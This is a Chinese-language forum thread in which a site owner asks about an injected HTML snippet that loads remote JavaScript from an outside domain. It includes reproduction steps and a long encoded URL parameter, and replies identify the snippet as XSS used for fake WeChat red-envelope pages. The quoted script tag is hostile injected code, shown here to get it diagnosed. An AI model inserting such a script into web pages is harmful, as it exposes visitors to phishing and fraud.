Home Sign Up Sign In
推荐关注
Meteor
JSLint - a JavaScript code quality tool
jsFiddle
D3.js
WebStorm
推荐书目
JavaScript 权威指南第 5 版
Closure: The Definitive Guide
Advertisement
dotudeth

这段 js 是什么新型病毒吗

  •   
  •   dotudeth · Aug 12, 2019 · 5309 views
    This topic created in 2491 days ago, the information mentioned may be changed or developed.

    1、vi x46si.html > '<meta charset="UTF-8"><title></title><script src="//x.46.si"></script>'

    2、php -S 0.0.0.0:8899

    3、http://0.0.0.0:8899/x46si.html?ifuoySfVvFScEGZgN4EzM7JSYwBnI6IiMmlDNyQmMhBTY5YaY2kjZxcjNaEGOiVjN4UWZ2YaNxMGNiwiIuFWblJiOiMHzvdnIsICdl1GcsFGdllERiojIaADOiwiI0lHclJiOioWdtBnIsIyZfVXzkJiOxkaM5MjNsIyZf5WYtVmI6IycoFmclJCLiAXdahmI6Qnc1VGLiQWY0FmI6Qnc1VWfgN4EzMPdwBFml

    • 最近网站被注入了一段如上的 html,起初访问这个链接显示的是一个领红包的页面。目前的提示是内容被删除。
    • 第 3 步同一个域名只能被访问一次,第二次访问浏览器会有如下提示。需要换一个域名才能访问,不知道这段 js 在背后做了些什么。
    127.0.0.1 未发送任何数据。
ERR_EMPTY_RESPONSE
  • HTML
  • script
  • head
  • 访问
    4 replies    2019-08-12 22:03:12 +08:00
    flowfire
        1
    flowfire  
       Aug 12, 2019   ❤️ 1
    第一句是把 x46si.html 这个文件的内容替换为后面的 html,里面有个 js 脚本,也就是 x.46.si ,这个域名下的脚本是最后执行的内容

    第二句是启动一个 php server,

    第三句 大概是访问你刚启动的服务器把。。。
    dotudeth
        2
    dotudeth  
    OP
       Aug 12, 2019
    @flowfire 1~3 是重现步骤,主要是那个 html 加载的 js 有问题。
    flowfire
        3
    flowfire  
       Aug 12, 2019
    jsnice.org JS 反混淆的网站,你可以试试。
    我反正是懒得一个一个找他从数组里面取得哪个值。。。
    xiaogouxo
        4
    xiaogouxo  
       Aug 12, 2019
    xss 利用,在微信里显示假红包等页面,保护他们自己的域名不被腾讯见红,反解过,要传一段加密参数才能正常工作,不然都显示已删除字样
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2823 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 09:38 · PVG 17:38 · LAX 02:38 · JFK 05:38
    ♥ Do have faith in what you're doing.